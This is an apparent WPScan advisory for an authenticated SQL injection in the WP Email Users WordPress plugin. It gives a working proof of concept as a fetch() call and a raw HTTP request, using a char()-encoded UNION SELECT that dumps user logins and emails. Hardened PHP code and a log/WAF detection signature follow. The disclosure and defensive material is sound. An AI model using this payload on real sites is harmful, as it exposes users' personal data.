
wpvulndb | Krzysztof Zając | WPVDB-ID: 0471D2E2-E759-468F-BECD-0B062F00B435
History: Jan 31, 2022 - 12:00 a.m.

WP Email Users <= 1.7.6 - Subscriber+ SQL Injection

2022-01-31 00:00:00
Krzysztof Zając
wpscan.com
9

EPSS: 0.001 (Low), percentile: 37.7%

The plugin does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, which is available to any authenticated user, allowing such users to perform SQL injection attacks.

PoC

As any authenticated user (such as a subscriber), the request below will display all users' email addresses:

```javascript
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({
    "action": "weu_selected_users_1",
    "data_raw[]": "0 UNION SELECT concat(char(97),char(58),char(49),char(58),char(123),char(105),char(58),char(48),char(59),char(115),char(58),char(54),char(57),char(58),char(34),char(49),char(32),char(85),char(78),char(73),char(79),char(78),char(32),char(83),char(69),char(76),char(69),char(67),char(84),char(32),char(99),char(111),char(110),char(99),char(97),char(116),char(40),char(117),char(115),char(101),char(114),char(95),char(108),char(111),char(103),char(105),char(110),char(44),char(32),char(99),char(104),char(97),char(114),char(40),char(52),char(52),char(41),char(44),char(32),char(117),char(115),char(101),char(114),char(95),char(101),char(109),char(97),char(105),char(108),char(41),char(32),char(70),char(82),char(79),char(77),char(32),char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115),char(34),char(59),char(125))"
  }),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));
```

The same request as raw HTTP:

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 1405
Connection: close
Cookie: [any authenticated user]

action=weu_selected_users_1&data_raw%5B%5D=0+UNION+SELECT+concat%28char%2897%29%2Cchar%2858%29%2Cchar%2849%29%2Cchar%2858%29%2Cchar%28123%29%2Cchar%28105%29%2Cchar%2858%29%2Cchar%2848%29%2Cchar%2859%29%2Cchar%28115%29%2Cchar%2858%29%2Cchar%2854%29%2Cchar%2857%29%2Cchar%2858%29%2Cchar%2834%29%2Cchar%2849%29%2Cchar%2832%29%2Cchar%2885%29%2Cchar%2878%29%2Cchar%2873%29%2Cchar%2879%29%2Cchar%2878%29%2Cchar%2832%29%2Cchar%2883%29%2Cchar%2869%29%2Cchar%2876%29%2Cchar%2869%29%2Cchar%2867%29%2Cchar%2884%29%2Cchar%2832%29%2Cchar%2899%29%2Cchar%28111%29%2Cchar%28110%29%2Cchar%2899%29%2Cchar%2897%29%2Cchar%28116%29%2Cchar%2840%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%2895%29%2Cchar%28108%29%2Cchar%28111%29%2Cchar%28103%29%2Cchar%28105%29%2Cchar%28110%29%2Cchar%2844%29%2Cchar%2832%29%2Cchar%2899%29%2Cchar%28104%29%2Cchar%2897%29%2Cchar%28114%29%2Cchar%2840%29%2Cchar%2852%29%2Cchar%2852%29%2Cchar%2841%29%2Cchar%2844%29%2Cchar%2832%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%2895%29%2Cchar%28101%29%2Cchar%28109%29%2Cchar%2897%29%2Cchar%28105%29%2Cchar%28108%29%2Cchar%2841%29%2Cchar%2832%29%2Cchar%2870%29%2Cchar%2882%29%2Cchar%2879%29%2Cchar%2877%29%2Cchar%2832%29%2Cchar%28119%29%2Cchar%28112%29%2Cchar%2895%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%28115%29%2Cchar%2834%29%2Cchar%2859%29%2Cchar%28125%29%29
```
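The root cause described above is the usual one for this class of bug: values taken from the request are spliced into the SQL text, so a value that is not a number becomes part of the statement. The following is an added illustration, not code from WP Email Users; the handler bodies, the capability `list_users` and the nonce action `weu_nonce` are assumptions. It shows the unsafe pattern for a WordPress AJAX handler that receives a `data_raw[]` array of user IDs, beside a hardened version that fixes authorisation, CSRF and parameterisation together.

```php
<?php
// Added example, not code from the WP Email Users plugin. The handler shape,
// the capability 'list_users' and the nonce action 'weu_nonce' are assumptions.

// Unsafe pattern: request values are concatenated into the SQL text, so an
// element such as "0 UNION SELECT ..." is executed as part of the statement.
function weu_selected_users_unsafe() {
    global $wpdb;
    $ids  = implode(',', (array) $_POST['data_raw']);
    $rows = $wpdb->get_results(
        "SELECT ID, user_email FROM {$wpdb->users} WHERE ID IN ($ids)"
    );
    wp_send_json_success($rows);
}

// Hardened version of the same handler.
function weu_selected_users_hardened() {
    global $wpdb;

    // 1. Authorisation: the action returns e-mail addresses, so require a
    //    capability that already implies access to the user list. A plain
    //    subscriber fails here before any query is built.
    if (!current_user_can('list_users')) {
        wp_send_json_error('forbidden', 403);   // exits
    }

    // 2. CSRF protection for the AJAX action (nonce action name assumed).
    check_ajax_referer('weu_nonce', 'nonce');

    // 3. Validation: the parameter is a list of user IDs, so coerce every
    //    element to a non-negative integer and drop anything that is not
    //    numeric (absint() turns "0 UNION SELECT ..." into 0, which is filtered).
    $raw = isset($_POST['data_raw']) ? (array) wp_unslash($_POST['data_raw']) : array();
    $ids = array_values(array_filter(array_map('absint', $raw)));
    if (empty($ids)) {
        wp_send_json_success(array());          // exits
    }

    // 4. Parameterisation: one %d placeholder per ID, bound via $wpdb->prepare,
    //    so the values can never alter the structure of the statement.
    $placeholders = implode(',', array_fill(0, count($ids), '%d'));
    $sql = $wpdb->prepare(
        "SELECT ID, user_email FROM {$wpdb->users} WHERE ID IN ($placeholders)",
        $ids
    );
    wp_send_json_success($wpdb->get_results($sql));
}

add_action('wp_ajax_weu_selected_users_1', 'weu_selected_users_hardened');
```

Each of the four layers would stop the published request on its own: the capability check because the PoC runs as a subscriber, the nonce because the request carries none, the integer coercion because the payload is not numeric, and the prepared statement because bound values cannot change the query. For detection while a site is still on a vulnerable version, a request to `admin-ajax.php` with `action=weu_selected_users_1` whose `data_raw[]` values contain anything other than digits is a precise signature for web server logs or a WAF rule.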

CPE Name          Operator    Version
wp-email-users    eq          *

